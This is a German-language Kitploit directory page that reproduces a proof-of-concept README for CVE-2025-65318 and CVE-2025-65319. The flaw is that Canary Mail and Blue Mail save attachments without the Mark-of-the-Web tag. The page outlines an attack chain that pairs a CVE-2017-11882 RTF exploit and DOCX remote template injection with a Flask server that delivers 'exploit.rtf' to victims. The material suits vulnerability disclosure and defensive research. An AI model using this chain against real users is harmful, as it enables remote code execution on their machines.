Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/bbaboha/cve-2025-65318-and-cve-2025-65319
SchwachstellenanalyseExploitationWebanwendungs-ExploitationMalware-AnalysePenetrationstestsLernen & Bildung
GitHubbbaboha/cve-2025-65318-and-cve-2025-65319

CVE-2025-65318-and-CVE-2025-65319

Unsicherer Umgang mit Anhängen bei Verwendung von Canary Mail oder Blue mail

Repository anzeigen
72vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC für CVE-2025-65318 und CVE-2025-65319

  • CVE-2025-65318 (BDU:2025-13740): Bei Verwendung der Anhangsinteraktionsfunktion speichert Canary Mail 5.1.40 und niedriger Dokumente ohne Mark-of-the-Web-Tag im Dateisystem, was Angreifern ermöglicht, die integrierten Dateischutzmechanismen sowohl des Windows-Betriebssystems als auch von Drittanbietersoftware zu umgehen.
  • CVE-2025-65319 (BDU:2025-13739): Bei Verwendung der Anhangsinteraktionsfunktion speichert Blue Mail 1.140.103 und niedriger Dokumente ohne Mark-of-the-Web-Tag im Dateisystem, was Angreifern ermöglicht, die integrierten Dateischutzmechanismen sowohl des Windows-Betriebssystems als auch von Drittanbietersoftware zu umgehen.

Übersicht

Das Kernproblem ist nicht, dass Benutzer schädliche Anhänge öffnen, sondern dass Apps wie Canary Mail oder Blue Mail eine bequeme, aber unsichere Funktion zum Speichern oder Öffnen dieser Anhänge bereitstellen. Ich betrachte dies als eine Sicherheitslücke, die Benutzer Angreifern aussetzt.

CWE-693 - Fehler im Schutzmechanismus

PoC

Um das unsichere Öffnen von Office Word-Anhängen über das Dialogfeld "Öffnen mit" oder "Speichern unter" zu demonstrieren, wurde die Schwachstelle CVE-2017-11882 im Gleichungseditor für Office Word 16 und niedriger verwendet.

  1. Erstellen Sie auf dem Host des Angreifers ein schädliches RTF-Objekt, das einen Rechner auf dem Host öffnet, unter Verwendung von dem Skript.
  • Stellen Sie einen Server bereit, der ein schädliches RTF-Dokument unter Verwendung von Remote Template Injection sendet.
  • root@kitploit:~
    from flask import Flask, send_file, request
    import logging
    from datetime import datetime
    
    app = Flask(__name__)
    
    # Configure logging
    logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
    logger = logging.getLogger(__name__)
    
    @app.before_request
    def log_request_info():
        logger.info(f'Request: {request.method} {request.url} from {request.remote_addr}')
    
    @app.after_request
    def log_response_info(response):
        logger.info(f'Response: Status {response.status_code} for {request.url}')
        return response
    
    @app.route('/download')
    def download_file():
        try:
            response = send_file('exploit.rtf', mimetype='application/msword', as_attachment=True)
            logger.info('File download successful')
            return response
        except FileNotFoundError:
            logger.error('File exploit.rtf not found')
            return 'File not found', 404
    
    if __name__ == '__main__':
        app.run(debug=False, host='0.0.0.0', port=5000)
    
    
    1. Erstellen Sie ein beliebiges DOCX-Dokument und verwenden Sie Remote Template Injection, indem Sie beispielsweise ein PowerShell-Skript ausführen.
    2. Der Angreifer sendet das resultierende schädliche DOCX-Dokument an das Opfer.
    3. Das Opfer öffnet das schädliche Dokument mithilfe der Funktionen "Öffnen mit" oder "Speichern unter" in Canary Mail/Blue Mail.
    4. Beim Öffnen eines schädlichen Dokuments kann das Opfer kompromittiert werden, ohne dass weitere Schaltflächen gedrückt werden müssen.

    Auswirkung

    Eine potenzielle RCE für Benutzer, die veraltete Microsoft Office Word-Softwareversionen 16 und niedriger verwenden

    Betroffene Versionen

    • Canary Mail 5.1.40 und niedriger
    • Blue Mail 1.140.103 und niedriger

    Video PoC

    CVE-2025-65318

    https://github.com/user-attachments/assets/fc99d603-f56f-451b-a9f2-821422feef61

    CVE-2025-65319

    https://github.com/user-attachments/assets/68b638b9-e906-4c78-baae-84a369f807f3

    Referenzen

    • https://bdu.fstec.ru/vul/2025-13739
    • https://bdu.fstec.ru/vul/2025-13740

    Haftungsausschluss

    Dieses Repository dient ausschließlich der Ausbildung und defensiven Sicherheitsforschung.

    Tool herunterladen